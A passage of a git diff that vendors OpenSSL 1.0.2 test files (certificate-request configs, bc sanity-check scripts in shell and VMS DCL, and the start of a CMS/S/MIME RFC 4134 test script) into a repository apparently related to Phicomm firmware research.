+distinguished_name    = req_distinguished_name
+encrypt_rsa_key               = no
+
+[ req_distinguished_name ]
+countryName                   = Country Name (2 letter code)
+countryName_default           = ES
+countryName_value             = ES
+
+organizationName                = Organization Name (eg, company)
+organizationName_value          = Tortilleras S.A.
+
+0.commonName                  = Common Name (eg, YOUR name)
+0.commonName_value            = Torti
+
+1.commonName                  = Common Name (eg, YOUR name)
+1.commonName_value            = Gordita
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Sssrsa.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Sssrsa.cnf
new file mode 100644
index 0000000..8c79a03
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Sssrsa.cnf
@@ -0,0 +1,26 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+# create RSA certs - Server
+
+RANDFILE              = ./.rnd
+
+####################################################################
+[ req ]
+distinguished_name    = req_distinguished_name
+encrypt_key           = no
+
+[ req_distinguished_name ]
+countryName                   = Country Name (2 letter code)
+countryName_default           = ES
+countryName_value             = ES
+
+organizationName                = Organization Name (eg, company)
+organizationName_value          = Tortilleras S.A.
+
+0.commonName                  = Common Name (eg, YOUR name)
+0.commonName_value            = Torti
+
+1.commonName                  = Common Name (eg, YOUR name)
+1.commonName_value            = Gordita
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Uss.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Uss.cnf
new file mode 100644
index 0000000..58ac0ca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Uss.cnf
@@ -0,0 +1,36 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+
+RANDFILE		= ./.rnd
+
+####################################################################
+[ req ]
+default_bits		= 2048
+default_keyfile 	= keySS.pem
+distinguished_name	= req_distinguished_name
+encrypt_rsa_key		= no
+default_md		= sha256
+
+[ req_distinguished_name ]
+countryName			= Country Name (2 letter code)
+countryName_default		= AU
+countryName_value		= AU
+
+organizationName                = Organization Name (eg, company)
+organizationName_value          = Dodgy Brothers
+
+0.commonName			= Common Name (eg, YOUR name)
+0.commonName_value		= Brother 1
+
+1.commonName			= Common Name (eg, YOUR name)
+1.commonName_value		= Brother 2
+
+[ v3_ee ]
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer:always
+basicConstraints = CA:false
+keyUsage = nonRepudiation, digitalSignature, keyEncipherment
+issuerAltName=issuer:copy
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/VMSca-response.1 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/VMSca-response.1
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/VMSca-response.1
@@ -0,0 +1 @@
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/VMSca-response.2 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/VMSca-response.2
new file mode 100644
index 0000000..9b48ee4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/VMSca-response.2
@@ -0,0 +1,2 @@
+y
+y
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/asn1test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/asn1test.c
new file mode 100644
index 0000000..4782f30
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/asn1test.c
@@ -0,0 +1,21 @@
+#include <openssl/x509.h>
+#include <openssl/asn1_mac.h>
+
+typedef struct X {
+    STACK_OF(X509_EXTENSION) *ext;
+} X;
+
+/* This isn't meant to run particularly, it's just to test type checking */
+int main(int argc, char **argv)
+{
+    X *x = NULL;
+    unsigned char **pp = NULL;
+
+    M_ASN1_I2D_vars(x);
+    M_ASN1_I2D_len_SEQUENCE_opt_type(X509_EXTENSION, x->ext,
+                                     i2d_X509_EXTENSION);
+    M_ASN1_I2D_seq_total();
+    M_ASN1_I2D_put_SEQUENCE_opt_type(X509_EXTENSION, x->ext,
+                                     i2d_X509_EXTENSION);
+    M_ASN1_I2D_finish();
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bctest b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bctest
new file mode 100755
index 0000000..bdb3218
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bctest
@@ -0,0 +1,111 @@
+#!/bin/sh
+
+# This script is used by test/Makefile.ssl to check whether a sane 'bc'
+# is installed.
+# ('make test_bn' should not try to run 'bc' if it does not exist or if
+# it is a broken 'bc' version that is known to cause trouble.)
+#
+# If 'bc' works, we also test if it knows the 'print' command.
+#
+# In any case, output an appropriate command line for running (or not
+# running) bc.
+
+
+IFS=:
+try_without_dir=true
+# First we try "bc", then "$dir/bc" for each item in $PATH.
+for dir in dummy:$PATH; do
+    if [ "$try_without_dir" = true ]; then
+      # first iteration
+      bc=bc
+      try_without_dir=false
+    else
+      # second and later iterations
+      bc="$dir/bc"
+      if [ ! -f "$bc" ]; then  # '-x' is not available on Ultrix
+        bc=''
+      fi
+    fi
+
+    if [ ! "$bc" = '' ]; then
+        failure=none
+
+
+        # Test for SunOS 5.[78] bc bug
+        "$bc" >tmp.bctest <<\EOF
+obase=16
+ibase=16
+a=AD88C418F31B3FC712D0425001D522B3AE9134FF3A98C13C1FCC1682211195406C1A6C66C6A\
+CEEC1A0EC16950233F77F1C2F2363D56DD71A36C57E0B2511FC4BA8F22D261FE2E9356D99AF57\
+10F3817C0E05BF79C423C3F66FDF321BE8D3F18F625D91B670931C1EF25F28E489BDA1C5422D1\
+C3F6F7A1AD21585746ECC4F10A14A778AF56F08898E965E9909E965E0CB6F85B514150C644759\
+3BE731877B16EA07B552088FF2EA728AC5E0FF3A23EB939304519AB8B60F2C33D6BA0945B66F0\
+4FC3CADF855448B24A9D7640BCF473E
+b=DCE91E7D120B983EA9A104B5A96D634DD644C37657B1C7860B45E6838999B3DCE5A555583C6\
+9209E41F413422954175A06E67FFEF6746DD652F0F48AEFECC3D8CAC13523BDAAD3F5AF4212BD\
+8B3CD64126E1A82E190228020C05B91C8B141F1110086FC2A4C6ED631EBA129D04BB9A19FC53D\
+3ED0E2017D60A68775B75481449
+(a/b)*b + (a%b) - a
+EOF
+        if [ 0 != "`cat tmp.bctest`" ]; then
+            failure=SunOStest
+        fi
+
+
+        if [ "$failure" = none ]; then
+            # Test for SCO bc bug.
+            "$bc" >tmp.bctest <<\EOF
+obase=16
+ibase=16
+-FFDD63BA1A4648F0D804F8A1C66C53F0D2110590E8A3907EC73B4AEC6F15AC177F176F2274D2\
+9DC8022EA0D7DD3ABE9746D2D46DD3EA5B5F6F69DF12877E0AC5E7F5ADFACEE54573F5D256A06\
+11B5D2BC24947724E22AE4EC3FB0C39D9B4694A01AFE5E43B4D99FB9812A0E4A5773D8B254117\
+1239157EC6E3D8D50199 * -FFDD63BA1A4648F0D804F8A1C66C53F0D2110590E8A3907EC73B4\
+AEC6F15AC177F176F2274D29DC8022EA0D7DD3ABE9746D2D46DD3EA5B5F6F69DF12877E0AC5E7\
+F5ADFACEE54573F5D256A0611B5D2BC24947724E22AE4EC3FB0C39D9B4694A01AFE5E43B4D99F\
+B9812A0E4A5773D8B2541171239157EC6E3D8D50199 - FFBACC221682DA464B6D7F123482522\
+02EDAEDCA38C3B69E9B7BBCD6165A9CD8716C4903417F23C09A85B851961F92C217258CEEB866\
+85EFCC5DD131853A02C07A873B8E2AF2E40C6D5ED598CD0E8F35AD49F3C3A17FDB7653E4E2DC4\
+A8D23CC34686EE4AD01F7407A7CD74429AC6D36DBF0CB6A3E302D0E5BDFCD048A3B90C1BE5AA8\
+E16C3D5884F9136B43FF7BB443764153D4AEC176C681B078F4CC53D6EB6AB76285537DDEE7C18\
+8C72441B52EDBDDBC77E02D34E513F2AABF92F44109CAFE8242BD0ECBAC5604A94B02EA44D43C\
+04E9476E6FBC48043916BFA1485C6093603600273C9C33F13114D78064AE42F3DC466C7DA543D\
+89C8D71
+AD534AFBED2FA39EE9F40E20FCF9E2C861024DB98DDCBA1CD118C49CA55EEBC20D6BA51B2271C\
+928B693D6A73F67FEB1B4571448588B46194617D25D910C6A9A130CC963155CF34079CB218A44\
+8A1F57E276D92A33386DDCA3D241DB78C8974ABD71DD05B0FA555709C9910D745185E6FE108E3\
+37F1907D0C56F8BFBF52B9704 % -E557905B56B13441574CAFCE2BD257A750B1A8B2C88D0E36\
+E18EF7C38DAC80D3948E17ED63AFF3B3467866E3B89D09A81B3D16B52F6A3C7134D3C6F5123E9\
+F617E3145BBFBE9AFD0D6E437EA4FF6F04BC67C4F1458B4F0F47B64 - 1C2BBBB19B74E86FD32\
+9E8DB6A8C3B1B9986D57ED5419C2E855F7D5469E35E76334BB42F4C43E3F3A31B9697C171DAC4\
+D97935A7E1A14AD209D6CF811F55C6DB83AA9E6DFECFCD6669DED7171EE22A40C6181615CAF3F\
+5296964
+EOF
+            if [ "0
+0" != "`cat tmp.bctest`" ]; then
+                failure=SCOtest
+            fi
+        fi
+
+
+        if [ "$failure" = none ]; then
+            # bc works; now check if it knows the 'print' command.
+            if [ "OK" = "`echo 'print \"OK\"' | $bc 2>/dev/null`" ]
+            then
+                echo "$bc"
+            else
+                echo "sed 's/print.*//' | $bc"
+            fi
+            exit 0
+        fi
+
+        echo "$bc does not work properly ('$failure' failed).  Looking for another bc ..." >&2
+    fi
+done
+
+echo "No working bc found.  Consider installing GNU bc." >&2
+if [ "$1" = ignore ]; then
+  echo "cat >/dev/null"
+  exit 0
+fi
+exit 1
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bctest.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bctest.com
new file mode 100644
index 0000000..d7e5ec1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bctest.com
@@ -0,0 +1,152 @@
+$!
+$! Check operation of "bc".
+$!
+$! 2010-04-05 SMS.  New.  Based (loosely) on "bctest".
+$!
+$!
+$ tmp_file_name = "tmp.bctest"
+$ failure = ""
+$!
+$! Basic command test.
+$!
+$ on warning then goto bc_fail
+$ bc
+$ on error then exit
+$!
+$! Test for SunOS 5.[78] bc bug.
+$!
+$ if (failure .eqs. "")
+$ then
+$!
+$     define /user_mode sys$output 'tmp_file_name'
+$     bc
+obase=16
+ibase=16
+a=AD88C418F31B3FC712D0425001D522B3AE9134FF3A98C13C1FCC1682211195406C1A6C66C6A\
+CEEC1A0EC16950233F77F1C2F2363D56DD71A36C57E0B2511FC4BA8F22D261FE2E9356D99AF57\
+10F3817C0E05BF79C423C3F66FDF321BE8D3F18F625D91B670931C1EF25F28E489BDA1C5422D1\
+C3F6F7A1AD21585746ECC4F10A14A778AF56F08898E965E9909E965E0CB6F85B514150C644759\
+3BE731877B16EA07B552088FF2EA728AC5E0FF3A23EB939304519AB8B60F2C33D6BA0945B66F0\
+4FC3CADF855448B24A9D7640BCF473E
+b=DCE91E7D120B983EA9A104B5A96D634DD644C37657B1C7860B45E6838999B3DCE5A555583C6\
+9209E41F413422954175A06E67FFEF6746DD652F0F48AEFECC3D8CAC13523BDAAD3F5AF4212BD\
+8B3CD64126E1A82E190228020C05B91C8B141F1110086FC2A4C6ED631EBA129D04BB9A19FC53D\
+3ED0E2017D60A68775B75481449
+(a/b)*b + (a%b) - a
+$     status = $status
+$     output_expected = "0"
+$     gosub check_output
+$     if (output .ne. 1)
+$     then
+$         failure = "SunOStest"
+$     else
+$         delete 'f$parse( tmp_file_name)'
+$     endif
+$ endif
+$!
+$! Test for SCO bc bug.
+$!
+$ if (failure .eqs. "")
+$ then
+$!
+$     define /user_mode sys$output 'tmp_file_name'
+$     bc
+obase=16
+ibase=16
+-FFDD63BA1A4648F0D804F8A1C66C53F0D2110590E8A3907EC73B4AEC6F15AC177F176F2274D2\
+9DC8022EA0D7DD3ABE9746D2D46DD3EA5B5F6F69DF12877E0AC5E7F5ADFACEE54573F5D256A06\
+11B5D2BC24947724E22AE4EC3FB0C39D9B4694A01AFE5E43B4D99FB9812A0E4A5773D8B254117\
+1239157EC6E3D8D50199 * -FFDD63BA1A4648F0D804F8A1C66C53F0D2110590E8A3907EC73B4\
+AEC6F15AC177F176F2274D29DC8022EA0D7DD3ABE9746D2D46DD3EA5B5F6F69DF12877E0AC5E7\
+F5ADFACEE54573F5D256A0611B5D2BC24947724E22AE4EC3FB0C39D9B4694A01AFE5E43B4D99F\
+B9812A0E4A5773D8B2541171239157EC6E3D8D50199 - FFBACC221682DA464B6D7F123482522\
+02EDAEDCA38C3B69E9B7BBCD6165A9CD8716C4903417F23C09A85B851961F92C217258CEEB866\
+85EFCC5DD131853A02C07A873B8E2AF2E40C6D5ED598CD0E8F35AD49F3C3A17FDB7653E4E2DC4\
+A8D23CC34686EE4AD01F7407A7CD74429AC6D36DBF0CB6A3E302D0E5BDFCD048A3B90C1BE5AA8\
+E16C3D5884F9136B43FF7BB443764153D4AEC176C681B078F4CC53D6EB6AB76285537DDEE7C18\
+8C72441B52EDBDDBC77E02D34E513F2AABF92F44109CAFE8242BD0ECBAC5604A94B02EA44D43C\
+04E9476E6FBC48043916BFA1485C6093603600273C9C33F13114D78064AE42F3DC466C7DA543D\
+89C8D71
+AD534AFBED2FA39EE9F40E20FCF9E2C861024DB98DDCBA1CD118C49CA55EEBC20D6BA51B2271C\
+928B693D6A73F67FEB1B4571448588B46194617D25D910C6A9A130CC963155CF34079CB218A44\
+8A1F57E276D92A33386DDCA3D241DB78C8974ABD71DD05B0FA555709C9910D745185E6FE108E3\
+37F1907D0C56F8BFBF52B9704 % -E557905B56B13441574CAFCE2BD257A750B1A8B2C88D0E36\
+E18EF7C38DAC80D3948E17ED63AFF3B3467866E3B89D09A81B3D16B52F6A3C7134D3C6F5123E9\
+F617E3145BBFBE9AFD0D6E437EA4FF6F04BC67C4F1458B4F0F47B64 - 1C2BBBB19B74E86FD32\
+9E8DB6A8C3B1B9986D57ED5419C2E855F7D5469E35E76334BB42F4C43E3F3A31B9697C171DAC4\
+D97935A7E1A14AD209D6CF811F55C6DB83AA9E6DFECFCD6669DED7171EE22A40C6181615CAF3F\
+5296964
+$     status = $status
+$     output_expected = "0\0"
+$     gosub check_output
+$     if (output .ne. 1)
+$     then
+$         failure = "SCOtest"
+$     else
+$         delete 'f$parse( tmp_file_name)'
+$     endif
+$ endif
+$!
+$! Test for working 'print' command.
+$!
+$ if (failure .eqs. "")
+$ then
+$!
+$     define /user_mode sys$output 'tmp_file_name'
+$     bc
+print "OK"
+$     status = $status
+$     output_expected = "OK"
+$     gosub check_output
+$     if (output .ne. 1)
+$     then
+$         failure = "printtest"
+$     else
+$         delete 'f$parse( tmp_file_name)'
+$     endif
+$ endif
+$!
+$ if (failure .nes. "")
+$ then
+$     write sys$output -
+       "No working bc found.  Consider installing GNU bc."
+$     exit %X00030000 ! %DCL-W-NORMAL
+$ endif
+$!
+$ exit
+$!
+$!
+$! Complete "bc" command failure.
+$!
+$ bc_fail:
+$ write sys$output -
+   "No ""bc"" program/symbol found.  Consider installing GNU bc."
+$ exit %X00030000 ! %DCL-W-NORMAL
+$!
+$!
+$! Output check subroutine.
+$!
+$ check_output:
+$     eof = 0
+$     line_nr = 0
+$     open /read tmp_file 'tmp_file_name'
+$     c_o_loop:
+$         read /error = error_read tmp_file line
+$         goto ok_read
+$         error_read:
+$         eof = 1
+$         ok_read:
+$         line_expected = f$element( line_nr, "\", output_expected)
+$         line_nr = line_nr+ 1
+$     if ((line_expected .nes. "\") .and. (.not. eof) .and. -
+       (line_expected .eqs. line)) then goto c_o_loop
+$!
+$     if ((line_expected .eqs. "\") .and. eof)
+$     then
+$         output = 1
+$     else
+$         output = 0
+$     endif
+$     close tmp_file
+$ return
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bftest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bftest.c
new file mode 120000
index 0000000..78b1749
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bftest.c
@@ -0,0 +1 @@
+../crypto/bf/bftest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bntest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bntest.c
new file mode 120000
index 0000000..03f54a2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bntest.c
@@ -0,0 +1 @@
+../crypto/bn/bntest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bntest.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bntest.com
new file mode 100644
index 0000000..6545d2e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/bntest.com
@@ -0,0 +1,76 @@
+$!
+$! Analyze bntest output file.
+$!
+$! Exit status = 1 (success) if all tests passed,
+$!               0 (warning) if any test failed.
+$!
+$! 2011-02-20 SMS.  Added code to skip "#" comments in the input file.
+$!
+$! 2010-04-05 SMS.  New.  Based (loosely) on perl code in bntest-vms.sh.
+$!
+$!                  Expect data like:
+$!                        test test_name1
+$!                        0
+$!                        [...]
+$!                        test test_name2
+$!                        0
+$!                        [...]
+$!                        [...]
+$!
+$!                  Some tests have no following "0" lines.
+$!
+$ result_file_name = f$edit( p1, "TRIM")
+$ if (result_file_name .eqs. "")
+$ then
+$     result_file_name = "bntest-vms.out"
+$ endif
+$!
+$ fail = 0
+$ passed = 0
+$ tests = 0
+$!
+$ on control_c then goto tidy
+$ on error then goto tidy
+$!
+$ open /read result_file 'result_file_name'
+$!
+$ read_loop:
+$     read /end = read_loop_end /error = tidy result_file line
+$     t1 = f$element( 0, " ", line)
+$!
+$!    Skip "#" comment lines.
+$     if (f$extract( 0, 1, f$edit( line, "TRIM")) .eqs. "#") then -
+       goto read_loop
+$!
+$     if (t1 .eqs. "test")
+$     then
+$         passed = passed+ 1
+$         tests = tests+ 1
+$         fail = 1
+$         t2 = f$extract( 5, 1000, line)
+$         write sys$output "verify ''t2'"
+$     else
+$         if (t1 .nes. "0")
+$         then
+$             write sys$output "Failed! bc: ''line'"
+$             passed = passed- fail
+$             fail = 0
+$         endif
+$     endif
+$ goto read_loop
+$ read_loop_end:
+$ write sys$output "''passed'/''tests' tests passed"
+$!
+$ tidy:
+$ if f$trnlnm( "result_file", "LNM$PROCESS_TABLE", , "SUPERVISOR", , "CONFINE")
+$ then
+$     close result_file
+$ endif
+$!
+$ if ((tests .gt. 0) .and. (tests .eq. passed))
+$ then
+$    exit 1
+$ else
+$    exit 0
+$ endif
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/casttest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/casttest.c
new file mode 120000
index 0000000..ac7ede8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/casttest.c
@@ -0,0 +1 @@
+../crypto/cast/casttest.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/clean_test.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/clean_test.com
new file mode 100755
index 0000000..7df633f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/clean_test.com
@@ -0,0 +1,35 @@
+$!
+$! Delete various test results files.
+$!
+$ def_orig = f$environment( "default")
+$ proc = f$environment( "procedure")
+$ proc_dev_dir = f$parse( "A.;", proc) - "A.;"
+$!
+$ on control_c then goto tidy
+$ on error then goto tidy
+$!
+$ set default 'proc_dev_dir'
+$!
+$ files := *.cms;*, *.srl;*, *.ss;*, -
+   cms.err;*, cms.out;*, newreq.pem;*, -
+   p.txt-zlib-cipher;*, -
+   smtst.txt;*, testkey.pem;*, testreq.pem;*, -
+   test_*.err;*, test_*.out;*, -
+   .rnd;*
+$!
+$ delim = ","
+$ i = 0
+$ loop:
+$    file = f$edit( f$element( i, delim, files), "trim")
+$    if (file .eqs. delim) then goto loop_end
+$    if (f$search( file) .nes. "") then -
+      delete 'p1' 'file'
+$    i = i+ 1
+$ goto loop
+$ loop_end:
+$!
+$ tidy:
+$ 
+$ if (f$type( def_orig) .nes. "") then -
+   set default 'def_orig'
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/cms-examples.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/cms-examples.pl
new file mode 100644
index 0000000..2e95b48
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/cms-examples.pl
@@ -0,0 +1,409 @@
+# test/cms-examples.pl
+# Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+# project.
+#
+# ====================================================================
+# Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions
+# are met:
+#
+# 1. Redistributions of source code must retain the above copyright
+#    notice, this list of conditions and the following disclaimer.
+#
+# 2. Redistributions in binary form must reproduce the above copyright
+#    notice, this list of conditions and the following disclaimer in
+#    the documentation and/or other materials provided with the
+#    distribution.
+#
+# 3. All advertising materials mentioning features or use of this
+#    software must display the following acknowledgment:
+#    "This product includes software developed by the OpenSSL Project
+#    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+#
+# 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+#    endorse or promote products derived from this software without
+#    prior written permission. For written permission, please contact
+#    licensing@OpenSSL.org.
+#
+# 5. Products derived from this software may not be called "OpenSSL"
+#    nor may "OpenSSL" appear in their names without prior written
+#    permission of the OpenSSL Project.
+#
+# 6. Redistributions of any form whatsoever must retain the following
+#    acknowledgment:
+#    "This product includes software developed by the OpenSSL Project
+#    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+#
+# THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+# EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+# ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+# OF THE POSSIBILITY OF SUCH DAMAGE.
+# ====================================================================
+
+# Perl script to run tests against S/MIME examples in RFC4134
+# Assumes RFC is in current directory and called "rfc4134.txt"
+
+use MIME::Base64;
+
+my $badttest = 0;
+my $verbose  = 1;
+
+my $cmscmd;
+my $exdir  = "./";
+my $exfile = "./rfc4134.txt";
+
+if (-f "../apps/openssl")
+	{
+	$cmscmd = "../util/shlib_wrap.sh ../apps/openssl cms";
+	}
+elsif (-f "..\\out32dll\\openssl.exe")
+	{
+	$cmscmd = "..\\out32dll\\openssl.exe cms";
+	}
+elsif (-f "..\\out32\\openssl.exe")
+	{
+	$cmscmd = "..\\out32\\openssl.exe cms";
+	}
+
+my @test_list = (
+    [ "3.1.bin"  => "dataout" ],
+    [ "3.2.bin"  => "encode, dataout" ],
+    [ "4.1.bin"  => "encode, verifyder, cont, dss" ],
+    [ "4.2.bin"  => "encode, verifyder, cont, rsa" ],
+    [ "4.3.bin"  => "encode, verifyder, cont_extern, dss" ],
+    [ "4.4.bin"  => "encode, verifyder, cont, dss" ],
+    [ "4.5.bin"  => "verifyder, cont, rsa" ],
+    [ "4.6.bin"  => "encode, verifyder, cont, dss" ],
+    [ "4.7.bin"  => "encode, verifyder, cont, dss" ],
+    [ "4.8.eml"  => "verifymime, dss" ],
+    [ "4.9.eml"  => "verifymime, dss" ],
+    [ "4.10.bin" => "encode, verifyder, cont, dss" ],
+    [ "4.11.bin" => "encode, certsout" ],
+    [ "5.1.bin"  => "encode, envelopeder, cont" ],
+    [ "5.2.bin"  => "encode, envelopeder, cont" ],
+    [ "5.3.eml"  => "envelopemime, cont" ],
+    [ "6.0.bin"  => "encode, digest, cont" ],
+    [ "7.1.bin"  => "encode, encrypted, cont" ],
+    [ "7.2.bin"  => "encode, encrypted, cont" ]
+);
+
+# Extract examples from RFC4134 text.
+# Base64 decode all examples, certificates and
+# private keys are converted to PEM format.
+
+my ( $filename, $data );
+
+my @cleanup = ( "cms.out", "cms.err", "tmp.der", "tmp.txt" );
+
+$data = "";
+
+open( IN, $exfile ) || die "Can't Open RFC examples file $exfile";
+
+while (<IN>) {
+    next unless (/^\|/);
+    s/^\|//;
+    next if (/^\*/);
+    if (/^>(.*)$/) {
+        $filename = $1;
+        next;
+    }
+    if (/^</) {
+        $filename = "$exdir/$filename";
+        if ( $filename =~ /\.bin$/ || $filename =~ /\.eml$/ ) {
+            $data = decode_base64($data);
+            open OUT, ">$filename";
+            binmode OUT;
+            print OUT $data;
+            close OUT;
+            push @cleanup, $filename;
+        }
+        elsif ( $filename =~ /\.cer$/ ) {
+            write_pem( $filename, "CERTIFICATE", $data );
+        }
+        elsif ( $filename =~ /\.pri$/ ) {
+            write_pem( $filename, "PRIVATE KEY", $data );
+        }
+        $data     = "";
+        $filename = "";
+    }
+    else {
+        $data .= $_;
+    }
+
+}
+
+my $secretkey =
+  "73:7c:79:1f:25:ea:d0:e0:46:29:25:43:52:f7:dc:62:91:e5:cb:26:91:7a:da:32";
+
+foreach (@test_list) {
+    my ( $file, $tlist ) = @$_;
+    print "Example file $file:\n";
+    if ( $tlist =~ /encode/ ) {
+        run_reencode_test( $exdir, $file );
+    }
+    if ( $tlist =~ /certsout/ ) {
+        run_certsout_test( $exdir, $file );
+    }
+    if ( $tlist =~ /dataout/ ) {
+        run_dataout_test( $exdir, $file );
+    }
+    if ( $tlist =~ /verify/ ) {
+        run_verify_test( $exdir, $tlist, $file );
+    }
+    if ( $tlist =~ /digest/ ) {
+        run_digest_test( $exdir, $tlist, $file );
+    }
+    if ( $tlist =~ /encrypted/ ) {
+        run_encrypted_test( $exdir, $tlist, $file, $secretkey );
+    }
+    if ( $tlist =~ /envelope/ ) {
+        run_envelope_test( $exdir, $tlist, $file );
+    }
+
+}
+
+foreach (@cleanup) {
+    unlink $_;
+}
+
+if ($badtest) {
+    print "\n$badtest TESTS FAILED!!\n";
+}
+else {
+    print "\n***All tests successful***\n";
+}
+
+sub write_pem {
+    my ( $filename, $str, $data ) = @_;
+
+    $filename =~ s/\.[^.]*$/.pem/;
+
+    push @cleanup, $filename;
+
+    open OUT, ">$filename";
+
+    print OUT "-----BEGIN $str-----\n";
+    print OUT $data;
+    print OUT "-----END $str-----\n";
+
+    close OUT;
+}
+
+sub run_reencode_test {
+    my ( $cmsdir, $tfile ) = @_;
+    unlink "tmp.der";
+
+    system( "$cmscmd -cmsout -inform DER -outform DER"
+          . " -in $cmsdir/$tfile -out tmp.der" );
+
+    if ($?) {
+        print "\tReencode command FAILED!!\n";
+        $badtest++;
+    }
+    elsif ( !cmp_files( "$cmsdir/$tfile", "tmp.der" ) ) {
+        print "\tReencode FAILED!!\n";
+        $badtest++;
+    }
+    else {
+        print "\tReencode passed\n" if $verbose;
+    }
+}
+
+sub run_certsout_test {
+    my ( $cmsdir, $tfile ) = @_;
+    unlink "tmp.der";
+    unlink "tmp.pem";
+
+    system( "$cmscmd -cmsout -inform DER -certsout tmp.pem"
+          . " -in $cmsdir/$tfile -out tmp.der" );
+
+    if ($?) {
+        print "\tCertificate output command FAILED!!\n";
+        $badtest++;
+    }
+    else {
+        print "\tCertificate output passed\n" if $verbose;
+    }
+}
+
+sub run_dataout_test {
+    my ( $cmsdir, $tfile ) = @_;
+    unlink "tmp.txt";
+
+    system(
+        "$cmscmd -data_out -inform DER" . " -in $cmsdir/$tfile -out tmp.txt" );
+
+    if ($?) {
+        print "\tDataout command FAILED!!\n";
+        $badtest++;
+    }
+    elsif ( !cmp_files( "$cmsdir/ExContent.bin", "tmp.txt" ) ) {
+        print "\tDataout compare FAILED!!\n";
+        $badtest++;
+    }
+    else {
+        print "\tDataout passed\n" if $verbose;
+    }
+}
+
+sub run_verify_test {
+    my ( $cmsdir, $tlist, $tfile ) = @_;
+    unlink "tmp.txt";
+
+    $form   = "DER"                     if $tlist =~ /verifyder/;
+    $form   = "SMIME"                   if $tlist =~ /verifymime/;
+    $cafile = "$cmsdir/CarlDSSSelf.pem" if $tlist =~ /dss/;
+    $cafile = "$cmsdir/CarlRSASelf.pem" if $tlist =~ /rsa/;
+
+    $cmd =
+        "$cmscmd -verify -inform $form"
+      . " -CAfile $cafile"
